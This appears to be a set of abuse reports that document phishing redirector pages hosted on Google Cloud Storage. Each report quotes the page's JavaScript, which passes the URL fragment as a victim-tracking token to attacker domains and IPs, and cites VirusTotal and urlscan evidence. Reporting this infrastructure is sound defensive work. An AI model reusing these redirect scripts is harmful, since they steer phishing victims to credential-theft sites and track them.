https://storage.googleapis.com/hqyoqzatqthj/aemmfcylvxeo.html
Content:
<script>document.location ...
show morehttps://storage.googleapis.com/hqyoqzatqthj/aemmfcylvxeo.html
Content:
<script>document.location.href = 'http://weatherthisday.com/anchor'+window.location.href.split('#')[1];</script>
Reloads to weatherthisday.com and uses parameters after # for redirecting to another domain, like qpuue.com (malicious, see https://urlscan.io/result/6258c382-eaa0-4bb1-bcd1-900631e856b0/#redirects)
Malicious, see
https://www.virustotal.com/gui/url/045641ae04917162f223915be90e90c3b66ad650dec1051e09b8eb7d7a6571c2
https://urlscan.io/search/#weatherthisday.com
show less
shopsplumbing.com
https://storage.googleapis.com/ch4tjzenymhiy7p0/56cb2ff.html
Content:
<scri ...
show moreshopsplumbing.com
https://storage.googleapis.com/ch4tjzenymhiy7p0/56cb2ff.html
Content:
<script type="text/javascript">
function getHash() {
if (window.location.hash) {
var hash = window.location.hash.substring(1);
if (hash.length > 5) {return hash;} else {return false;}
} else {return false;}
}
var hashCode = getHash();var dom = "http://shopsplumbing.com";
if(hashCode){var url = dom+"/"+hashCode;}else{var url = dom+"/404.html";}
window.location.replace(url);
</script>
If a string longer than characters is present, this string is used by shopsplumbing.com to track the phishing victim and to redirect the victim to the real phishing site, like summitray.com (https://www.virustotal.com/gui/domain/summitray.com)
Malicious:
https://www.virustotal.com/gui/domain/shopsplumbing.com
https://urlscan.io/search/#shopsplumbing.com
show less
quietifiredesign.com
http://quietifiredesign.com/anchor/
Source:
<script type="text/javascrip ...
show morequietifiredesign.com
http://quietifiredesign.com/anchor/
Source:
<script type="text/javascript">
function getHash() {
if (window.location.hash) {
var hash = window.location.hash.substring(1);
if (hash.length > 5) {
return hash;
} else {
return false;
}
} else {
return false;
}
}
var hashCode = getHash();
var dom = "http://"+window.location.hostname;
if(hashCode){
var url = dom+"/"+hashCode;
}else{
var url = dom+"/404.html";
}
window.location.replace(url);
</script>
Script used to take a codes string which is used to track victims and to redirect them to a phishing website.
show less
helpinneed.asso.eu.org
https://storage.googleapis.com/sul04dmxlnxzha0x/ud05f3x5zixj7zmf/1cb975f.h ...
show morehelpinneed.asso.eu.org
https://storage.googleapis.com/sul04dmxlnxzha0x/ud05f3x5zixj7zmf/1cb975f.html
Content:
<script type="text/javascript">
function getHash() {
if (window.location.hash) {
var hash = window.location.hash.substring(1);
if (hash.length > 5) {return hash;} else {return false;}
} else {return false;}
}
var hashCode = getHash();var dom = "http://helpinneed.asso.eu.org";
if(hashCode){var url = dom+"/"+hashCode;}else{var url = dom+"/404.html";}
window.location.replace(url);
</script>
Script is used by phishing criminals to redirect victims to another domain
Malicious, see
https://urlscan.io/search/#helpinneed.asso.eu.org
https://www.virustotal.com/gui/domain/helpinneed.asso.eu.org
show less
madisonsoho.net
https://bit.ly/3OXfKTz
content:
<script type="text/javascript">
function get ...
show moremadisonsoho.net
https://bit.ly/3OXfKTz
content:
<script type="text/javascript">
function getHash() {
if (window.location.hash) {
var hash = window.location.hash.substring(1);
if (hash.length > 5) {
return hash;
} else {
return false;
}
} else {
return false;
}
}
var hashCode = getHash();
var dom = "http://"+window.location.hostname;
if(hashCode){
var url = dom+"/"+hashCode;
}else{
var url = dom+"/404.html";
}
window.location.replace(url);
</script>
show less
shopsplumbing.com
https://storage.googleapis.com/i4h4l0cburjc095v/ygnde4cft4zz145l/554a079.html
...
show moreshopsplumbing.com
https://storage.googleapis.com/i4h4l0cburjc095v/ygnde4cft4zz145l/554a079.html
Content:
<script type="text/javascript">
function getHash() {
if (window.location.hash) {
var hash = window.location.hash.substring(1);
if (hash.length > 5) {return hash;} else {return false;}
} else {return false;}
}
var hashCode = getHash();var dom = "http://shopsplumbing.com";
if(hashCode){var url = dom+"/"+hashCode;}else{var url = dom+"/404.html";}
window.location.replace(url);
</script>
If a string longer than characters is present, this string is used by shopsplumbing.com to track the phishing victim and to redirect the victim to the real phishing site, like summitray.com (https://www.virustotal.com/gui/domain/summitray.com)
Malicious:
https://www.virustotal.com/gui/domain/shopsplumbing.com
https://urlscan.io/search/#shopsplumbing.com
show less
shopsplumbing.com
https://storage.googleapis.com/ch4tjzenymhiy7p0/56cb2ff.html
Content:
<scri ...
show moreshopsplumbing.com
https://storage.googleapis.com/ch4tjzenymhiy7p0/56cb2ff.html
Content:
<script type="text/javascript">
function getHash() {
if (window.location.hash) {
var hash = window.location.hash.substring(1);
if (hash.length > 5) {return hash;} else {return false;}
} else {return false;}
}
var hashCode = getHash();var dom = "http://shopsplumbing.com";
if(hashCode){var url = dom+"/"+hashCode;}else{var url = dom+"/404.html";}
window.location.replace(url);
</script>
If a string longer than characters is present, this string is used by shopsplumbing.com to track the phishing victim and to redirect the victim to the real phishing site, like summitray.com (https://www.virustotal.com/gui/domain/summitray.com)
Malicious:
https://www.virustotal.com/gui/domain/shopsplumbing.com
https://urlscan.io/search/#shopsplumbing.com
show less
apexhorizoncraft.com
https://storage.googleapis.com/jarindma/mobiliaice.html
Content:
<script ...
show moreapexhorizoncraft.com
https://storage.googleapis.com/jarindma/mobiliaice.html
Content:
<script>
var tarcking_param = window.location.href.split('#')[1];
var srv_ip = "apexhorizoncraft.com";
if(!tarcking_param){
alert("please set tracking params!");
}else{
document.location.href = 'http://'+srv_ip+'/t/'+tarcking_param;
}
</script>
Script used to transfer the string after # to apexhorizoncraft.com, which uses this string to track the victim and to redirect the victim to the real phishing site, like opt.listarmor.com (malicious, see https://www.virustotal.com/gui/domain/opt.listarmor.com)
Cloudflare is aware of the malicious content, but does not stop the passing thru of information…
Cloudflare confirmed the domain is hosted here:
Hosting Provider OVH SAS [email protected]
Malicious, see:
https://urlscan.io/search/#apexhorizoncraft.com
https://www.virustotal.com/gui/url/37586b5dcc1940273f9b5a0984b5fcda3e0f391d95741e358a0132a4e8384136
show less
https://storage.googleapis.com/fdg13erh2e3r1h5rtj/g1erh6r5the.html
<script>document.location.href ...
show morehttps://storage.googleapis.com/fdg13erh2e3r1h5rtj/g1erh6r5the.html
<script>document.location.href = 'http://tourismalaysia.com/anchor'+window.location.href.split('#')[1];</script>
tourismalaysia.com is part of phishing reload chain used by criminals
Malicious, see
https://urlscan.io/search/#tourismalaysia.com
https://www.virustotal.com/gui/url/7e599bf23cfd2d06979d73687e73f546a5669271e37ebc53b3e9fcc4b564b106?nocache=1
show less
https://storage.googleapis.com/bhsales25/bhsales4wd.html
Content:
<script>
var tarcking_param = ...
show morehttps://storage.googleapis.com/bhsales25/bhsales4wd.html
Content:
<script>
var tarcking_param = window.location.href.split('#')[1];
var srv_ip = "185.80.128.4";
if(!tarcking_param){
alert("please set tracking params!");
}else{
document.location.href = 'http://'+srv_ip+'/?'+tarcking_param;
}
</script>
Script reloads to IP 185.80.128.4 and the string after # is used to track the victim and to redirect the victims to the phishing domain like intotechworld.com (malicious, see https://www.virustotal.com/gui/domain/intotechworld.com)
Malicious, see
https://www.virustotal.com/gui/ip-address/185.80.128.4/detection
https://urlscan.io/search/#185.80.128.4
show less
https://storage.googleapis.com/xcvbds1bdf351gze3r5g/d1b3e5rfd2r.html
Content:
<script>document ...
show morehttps://storage.googleapis.com/xcvbds1bdf351gze3r5g/d1b3e5rfd2r.html
Content:
<script>document.location.href = 'http://undertalehadid.net/anchor'+window.location.href.split('#')[1];</script>
Reloads to undertalehadid.net and the string behind anchor is used to track the victim of the phishing
undertalehadid.net is malicious,
see
https://www.virustotal.com/gui/domain/undertalehadid.net
https://urlscan.io/search/#undertalehadid.net
show less
https://storage.googleapis.com/fdg13erh2e3r1h5rtj/g1erh6r5the.html
<script>document.location.href ...
show morehttps://storage.googleapis.com/fdg13erh2e3r1h5rtj/g1erh6r5the.html
<script>document.location.href = 'http://tourismalaysia.com/anchor'+window.location.href.split('#')[1];</script>
tourismalaysia.com is part of phishing reload chain used by criminals
Malicious, see
https://urlscan.io/search/#tourismalaysia.com
https://www.virustotal.com/gui/url/7e599bf23cfd2d06979d73687e73f546a5669271e37ebc53b3e9fcc4b564b106?nocache=1
show less
https://storage.googleapis.com/jarindma/mobiliaice.html
Content:
<script>
var tarcking_param ...
show morehttps://storage.googleapis.com/jarindma/mobiliaice.html
Content:
<script>
var tarcking_param = window.location.href.split('#')[1];
var srv_ip = "apexhorizoncraft.com";
if(!tarcking_param){
alert("please set tracking params!");
}else{
document.location.href = 'http://'+srv_ip+'/t/'+tarcking_param;
}
</script>
Part of the reload chain used by phishing criminals…
Malicious, see:
https://www.virustotal.com/gui/domain/apexhorizoncraft.com/detection
https://urlscan.io/search/#apexhorizoncraft.com
show less
https://storage.googleapis.com/hqyoqzatqthj/aemmfcylvxeo.html
Content:
<script>document.location ...
show morehttps://storage.googleapis.com/hqyoqzatqthj/aemmfcylvxeo.html
Content:
<script>document.location.href = 'http://weatherthisday.com/anchor'+window.location.href.split('#')[1];</script>
Reloads to weatherthisday.com and uses parameters after # for redirecting to another domain, like qpuue.com (malicious, see https://urlscan.io/result/6258c382-eaa0-4bb1-bcd1-900631e856b0/#redirects)
Malicious, see
https://www.virustotal.com/gui/url/045641ae04917162f223915be90e90c3b66ad650dec1051e09b8eb7d7a6571c2
https://urlscan.io/search/#weatherthisday.com
show less
https://storage.googleapis.com/jarindma/mobiliaice.html
Content:
<script>
var tarcking_param ...
show morehttps://storage.googleapis.com/jarindma/mobiliaice.html
Content:
<script>
var tarcking_param = window.location.href.split('#')[1];
var srv_ip = "apexhorizoncraft.com";
if(!tarcking_param){
alert("please set tracking params!");
}else{
document.location.href = 'http://'+srv_ip+'/t/'+tarcking_param;
}
</script>
Part of the reload chain used by phishing criminals…
Malicious, see:
https://www.virustotal.com/gui/domain/apexhorizoncraft.com/detection
https://urlscan.io/search/#apexhorizoncraft.com
show less
unassigned.172-81-61-226.spryt.net
https://storage.googleapis.com/in1ka/djy1.html
Content:
<m ...
show moreunassigned.172-81-61-226.spryt.net
https://storage.googleapis.com/in1ka/djy1.html
Content:
<meta http-equiv="refresh" content="3; url=">
<script>
document.location.href = 'http://unassigned.172-81-61-226.spryt.net/'+window.location.href.split('#')[1];
</script>
This script is used by phishing criminals to transfer a string to IP 172.81.61.226 and this IP uses this string to travk the victim and to redirect the victim to the real phishing website
Malicious, see:
https://urlscan.io/search/#172.81.61.226
https://www.virustotal.com/gui/ip-address/172.81.61.226
show less
moviedownloadserver.com
https://storage.googleapis.com/loblaman996655/lobla.html
Content:
<sc ...
show moremoviedownloadserver.com
https://storage.googleapis.com/loblaman996655/lobla.html
Content:
<script>document.location.href = 'http://moviedownloadserver.com//anchor'+window.location.href.split('#')[1];</script>
Script used by phishing criminals to take the string after # to track the identity of the victim and to redirect the victim to the real phishing website, like oceanoscarkey.com (malicious, see https://www.virustotal.com/gui/domain/oceanoscarkey.com/detection)
Malicious, see:
https://www.virustotal.com/gui/url/f8812a6dff0b1163d02b8e62a4f065b3504b5e6b94b0358c62322a30090696ec
show less
moviedownloadserver.com
https://storage.googleapis.com/loblaman996655/lobla.html
Content:
<sc ...
show moremoviedownloadserver.com
https://storage.googleapis.com/loblaman996655/lobla.html
Content:
<script>document.location.href = 'http://moviedownloadserver.com//anchor'+window.location.href.split('#')[1];</script>
This code takes the string behind the # in the link and transfers this information to moviedownloadserver.com, which in turn uses this stting to redirect victims to another phishing domain, like e.g. bongmath.download (https://www.virustotal.com/gui/url/0668067d881f0eb47fa8300e352919ecfdd569fedfcbcab6dda8f1235a24d1e1)
Malicious, see:
https://urlscan.io/search/#moviedownloadserver.com
https://www.virustotal.com/gui/url/f8812a6dff0b1163d02b8e62a4f065b3504b5e6b94b0358c62322a30090696ec
show less
oceanoscarkey.com
Part of reload chain used by phishing criminals
Malicious, see https://www.v ...
show moreoceanoscarkey.com
Part of reload chain used by phishing criminals
Malicious, see https://www.virustotal.com/gui/url/222b17a7337e7536efde6fc1ad101f20208580ebb18cceb4c7613c5741e5241f
show less
https://storage.googleapis.com/jarindma/mobiliaice.html
Content:
<script>
var tarcking_param ...
show morehttps://storage.googleapis.com/jarindma/mobiliaice.html
Content:
<script>
var tarcking_param = window.location.href.split('#')[1];
var srv_ip = "apexhorizoncraft.com";
if(!tarcking_param){
alert("please set tracking params!");
}else{
document.location.href = 'http://'+srv_ip+'/t/'+tarcking_param;
}
</script>
Part of the reload chain used by phishing criminals…
Malicious, see:
https://www.virustotal.com/gui/domain/apexhorizoncraft.com/detection
https://urlscan.io/search/#apexhorizoncraft.com
show less
https://storage.googleapis.com/hqyoqzatqthj/aemmfcylvxeo.html
Content:
<script>document.location ...
show morehttps://storage.googleapis.com/hqyoqzatqthj/aemmfcylvxeo.html
Content:
<script>document.location.href = 'http://weatherthisday.com/anchor'+window.location.href.split('#')[1];</script>
Reloads to weatherthisday.com and uses parameters after # for redirecting to another domain, like qpuue.com (malicious, see https://urlscan.io/result/6258c382-eaa0-4bb1-bcd1-900631e856b0/#redirects)
Malicious, see
https://www.virustotal.com/gui/url/045641ae04917162f223915be90e90c3b66ad650dec1051e09b8eb7d7a6571c2
https://urlscan.io/search/#weatherthisday.com
show less
PhishingEmail Spam
By clicking “Accept all”, you agree to the storing of cookies on your device to remember preferences and
analyze site usage.
Read more
- Required to log into your AbuseIPDB account, and store these cookie preferences.